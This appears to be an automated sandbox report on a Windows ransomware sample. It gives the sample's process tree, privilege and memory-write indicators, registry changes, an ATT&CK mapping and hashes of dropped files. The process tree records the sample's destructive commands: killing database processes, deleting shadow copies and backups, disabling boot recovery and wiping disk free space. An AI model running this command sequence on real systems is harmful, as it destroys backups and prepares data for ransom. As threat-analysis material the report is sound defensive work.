2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	2572	taskkill.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	2900	taskkill.exe
Token: SeDebugPrivilege	352	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	2488	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	796	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2600	WMIC.exe
Token: SeSecurityPrivilege	2600	WMIC.exe
Token: SeTakeOwnershipPrivilege	2600	WMIC.exe
Token: SeLoadDriverPrivilege	2600	WMIC.exe
Token: SeSystemProfilePrivilege	2600	WMIC.exe
Token: SeSystemtimePrivilege	2600	WMIC.exe
Token: SeProfSingleProcessPrivilege	2600	WMIC.exe
Token: SeIncBasePriorityPrivilege	2600	WMIC.exe
Token: SeCreatePagefilePrivilege	2600	WMIC.exe
Token: SeBackupPrivilege	2600	WMIC.exe
Token: SeRestorePrivilege	2600	WMIC.exe
Token: SeShutdownPrivilege	2600	WMIC.exe
Token: SeDebugPrivilege	2600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2600	WMIC.exe
Token: SeRemoteShutdownPrivilege	2600	WMIC.exe
Token: SeUndockPrivilege	2600	WMIC.exe
Token: SeManageVolumePrivilege	2600	WMIC.exe
Token: 33	2600	WMIC.exe
Token: 34	2600	WMIC.exe
Token: 35	2600	WMIC.exe
Token: SeBackupPrivilege	2088	vssvc.exe
Token: SeRestorePrivilege	2088	vssvc.exe
Token: SeAuditPrivilege	2088	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2536 wrote to memory of 2652	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	90
PID 2536 wrote to memory of 2652	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	90
PID 2536 wrote to memory of 2652	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	90
PID 2536 wrote to memory of 2652	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	90
PID 2652 wrote to memory of 1692	2652	cmd.exe	114
PID 2652 wrote to memory of 1692	2652	cmd.exe	114
PID 2652 wrote to memory of 1692	2652	cmd.exe	114
PID 2652 wrote to memory of 1692	2652	cmd.exe	114
PID 2536 wrote to memory of 1756	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	29
PID 2536 wrote to memory of 1756	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	29
PID 2536 wrote to memory of 1756	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	29
PID 2536 wrote to memory of 1756	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	29
PID 1756 wrote to memory of 2724	1756	cmd.exe	88
PID 1756 wrote to memory of 2724	1756	cmd.exe	88
PID 1756 wrote to memory of 2724	1756	cmd.exe	88
PID 1756 wrote to memory of 2724	1756	cmd.exe	88
PID 2724 wrote to memory of 2764	2724	cmd.exe	87
PID 2724 wrote to memory of 2764	2724	cmd.exe	87
PID 2724 wrote to memory of 2764	2724	cmd.exe	87
PID 2536 wrote to memory of 3044	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	32
PID 2536 wrote to memory of 3044	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	32
PID 2536 wrote to memory of 3044	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	32
PID 2536 wrote to memory of 3044	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	32
PID 3044 wrote to memory of 2580	3044	cmd.exe	131
PID 3044 wrote to memory of 2580	3044	cmd.exe	131
PID 3044 wrote to memory of 2580	3044	cmd.exe	131
PID 3044 wrote to memory of 2580	3044	cmd.exe	131
PID 2580 wrote to memory of 2096	2580	cmd.exe	53
PID 2580 wrote to memory of 2096	2580	cmd.exe	53
PID 2580 wrote to memory of 2096	2580	cmd.exe	53
PID 2536 wrote to memory of 2888	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	52
PID 2536 wrote to memory of 2888	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	52
PID 2536 wrote to memory of 2888	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	52
PID 2536 wrote to memory of 2888	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	52
PID 2888 wrote to memory of 2956	2888	cmd.exe	50
PID 2888 wrote to memory of 2956	2888	cmd.exe	50
PID 2888 wrote to memory of 2956	2888	cmd.exe	50
PID 2888 wrote to memory of 2956	2888	cmd.exe	50
PID 2956 wrote to memory of 2596	2956	cmd.exe	33
PID 2956 wrote to memory of 2596	2956	cmd.exe	33
PID 2956 wrote to memory of 2596	2956	cmd.exe	33
PID 2536 wrote to memory of 2744	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	49
PID 2536 wrote to memory of 2744	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	49
PID 2536 wrote to memory of 2744	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	49
PID 2536 wrote to memory of 2744	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	49
PID 2744 wrote to memory of 2044	2744	cmd.exe	47
PID 2744 wrote to memory of 2044	2744	cmd.exe	47
PID 2744 wrote to memory of 2044	2744	cmd.exe	47
PID 2744 wrote to memory of 2044	2744	cmd.exe	47
PID 2044 wrote to memory of 2572	2044	cmd.exe	46
PID 2044 wrote to memory of 2572	2044	cmd.exe	46
PID 2044 wrote to memory of 2572	2044	cmd.exe	46
PID 2536 wrote to memory of 2624	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	45
PID 2536 wrote to memory of 2624	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	45
PID 2536 wrote to memory of 2624	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	45
PID 2536 wrote to memory of 2624	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	45
PID 2624 wrote to memory of 1980	2624	cmd.exe	44
PID 2624 wrote to memory of 1980	2624	cmd.exe	44
PID 2624 wrote to memory of 1980	2624	cmd.exe	44
PID 2624 wrote to memory of 1980	2624	cmd.exe	44
PID 1980 wrote to memory of 2876	1980	cmd.exe	43
PID 1980 wrote to memory of 2876	1980	cmd.exe	43
PID 1980 wrote to memory of 2876	1980	cmd.exe	43
PID 2536 wrote to memory of 2292	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	42

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
"C:\Users\Admin\AppData\Local\Temp\902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2536
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
  2⤵
  PID:3000
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
  2⤵
  PID:2292
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2624
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2744
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2888
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
  2⤵
  PID:564
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:1808
  - - C:\Windows\system32\net.exe
      net stop MSSQLServerADHelper100
      4⤵
      PID:828
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        5⤵
        
        PID:1092
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
  2⤵
  PID:1480
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
  2⤵
  PID:268
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
  2⤵
  PID:1728
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
  2⤵
  PID:1328
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
  2⤵
  PID:908
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
  2⤵
  PID:2964
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
  2⤵
  PID:2848
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
  2⤵
  PID:2652
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
  2⤵
  PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:300
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic.exe SHADOWCOPY /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2600
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:1648
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2848
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
  2⤵
  PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:2356
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} recoverynabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2364
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
  2⤵
  PID:2028
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:1692
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      Deletes System State backups
      PID:2464
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
  2⤵
  PID:472
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:2628
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
  2⤵
  PID:1684
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
  2⤵
  PID:1948
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
  2⤵
  PID:1316
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
  2⤵
  PID:836
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
  2⤵
  PID:1964
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
  2⤵
  PID:1952
- C:\Windows\SysWOW64\cipher.exe
  cipher /w:\\?\F:
  2⤵
  - Enumerates connected drives
  PID:3048
- C:\Windows\SysWOW64\cipher.exe
  cipher /w:\\?\A:
  2⤵
  - Enumerates connected drives
  PID:2888
- C:\Windows\SysWOW64\cipher.exe
  cipher /w:\\?\C:
  2⤵
  PID:1684

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1196
- C:\Users\Admin\AppData\Local\Temp\902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe -network
  2⤵
  - Adds Run key to start application
  - System policy modification
  PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:2944

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
1⤵
PID:1692

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlserv.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2596

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlceip.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2812

C:\Windows\system32\taskkill.exe
taskkill -f -im fdlauncher.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
1⤵
PID:2560

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
1⤵
PID:2160

C:\Windows\system32\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\system32\taskkill.exe
taskkill -f -im msmdsrv.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\system32\taskkill.exe
taskkill -f -im sql writer.exe
1⤵
- Kills process with taskkill
PID:2096

C:\Windows\system32\taskkill.exe
taskkill -f -im fdhost.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\system32\taskkill.exe
taskkill -f -im pg_ctl.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\system32\taskkill.exe
taskkill -f -impostgres.exe
1⤵
- Kills process with taskkill
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
1⤵
PID:940

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
1⤵
PID:792

C:\Windows\system32\taskkill.exe
taskkill -f -im msftesql.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
1⤵
PID:2824

C:\Windows\system32\taskkill.exe
taskkill -f -im ReportingServicesService.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
1⤵
PID:2532

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
1⤵
PID:1588

C:\Windows\system32\taskkill.exe
taskkill -f -im SQLAGENT.EXE
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:352

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
1⤵
PID:2040

C:\Windows\system32\taskkill.exe
taskkill -f -im Ssms.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
1⤵
PID:2832

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlbrowser.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
1⤵
PID:1260
- C:\Windows\system32\net.exe
  net stop MSSQL$MSFW
  2⤵
  PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
1⤵
PID:1636
- C:\Windows\system32\net.exe
  net stop SQLAgent$MSFW
  2⤵
  PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
1⤵
PID:2480
- C:\Windows\system32\wbadmin.exe
  wbadmin delete backup -keepVersion:0 -quiet
  2⤵
  - Deletes system backups
  - Drops file in Windows directory
  PID:1580

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
1⤵
PID:2224
- C:\Windows\system32\wbadmin.exe
  wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
  2⤵
  PID:2940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter
1⤵
PID:2372

C:\Windows\system32\net.exe
net stop SQLWriter
1⤵
PID:2332

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
1⤵
PID:2000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop REportServer$ISARS
1⤵
PID:1360

C:\Windows\system32\net.exe
net stop REportServer$ISARS
1⤵
PID:1932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
1⤵
PID:2248

C:\Windows\system32\net.exe
net stop SQLBrowser
1⤵
PID:920

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
1⤵
PID:912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
1⤵
PID:2140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
1⤵
PID:1960

C:\Windows\system32\net.exe
net stop SQLAgent$ISARS
1⤵
PID:1652

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
1⤵
PID:1356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
1⤵
PID:832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
1⤵
PID:2388

C:\Windows\system32\net.exe
net stop MSSQL$ISARS
1⤵
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
1⤵
PID:1144

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
1KB

MD5
4cc6606a31d101e258de3b8d38624a42

SHA1
d894621d17c5458d446305ecc8deed92fc736b3e

SHA256
fdfd47e31ec861813587f4e28bfa3e05b0321aabf2848dcf2b0c07d855e68794

SHA512
d66b98795ae60fc901431db7fde5e7b16271dc52f311b75788bb8a598bf6568629a3d161aa6b9effdc3744c9f7b3290a4e358a8f5d10412a651c2e104f6910eb

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

Filesize
1KB

MD5
20758c4ac9823cc2226aa63c92443718

SHA1
0c71c9ceffbae0162e80a20d2883f38c4865d310

SHA256
de15aacd8274849c55c88903d19422d6bc410e5ec2742d2f59d90683fce89031

SHA512
b6532d93d33242e7353f271252b9246cd9814ef554a30e2dd018cbb93fb0c587b99b74d008ac098274c86ca70251d772840e6834d9c9d7829544f01be5b29f28

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
6696119f5b7b0482d9a8563d2d661781

SHA1
cb3dd2ad279ab490f674a1f6ee6b40facf79b5b1

SHA256
31ba98af2755ca4038ad9baeb05f9f5019f2abd434b1a9352b312526f637b1ab

SHA512
25ae752c4ad2f1443fc82b39544b48a77b853030c5265f7c63c3094f7baed96c64a60f744d8ad85227585ff70f85b097b2cce69772a05fabf4e94305168a67ec

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

Filesize
1KB

MD5
289b121448bda4d98f7f16959bd62985

SHA1
a732c27bf9692773180c6ea8839e2157b80fea7c

SHA256
85b552cc812cb74e99264e6b4411d1f92c3ddf21b7c52ae042cd41fdd27dec5f

SHA512
5aeea590a86d94b1dc9edf6be8dcd8ce34e7df2c2aeb3ab4b424035a09696674e498d8eca1f6aaa1d1d4149480b9107d80e56c539109114e203b57ad9e461d30

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL

Filesize
240KB

MD5
497f39f0f32a3c131860faa5a5c849ad

SHA1
8ddaa74d7f9a78fc845fa91c46d65992f497bc1c

SHA256
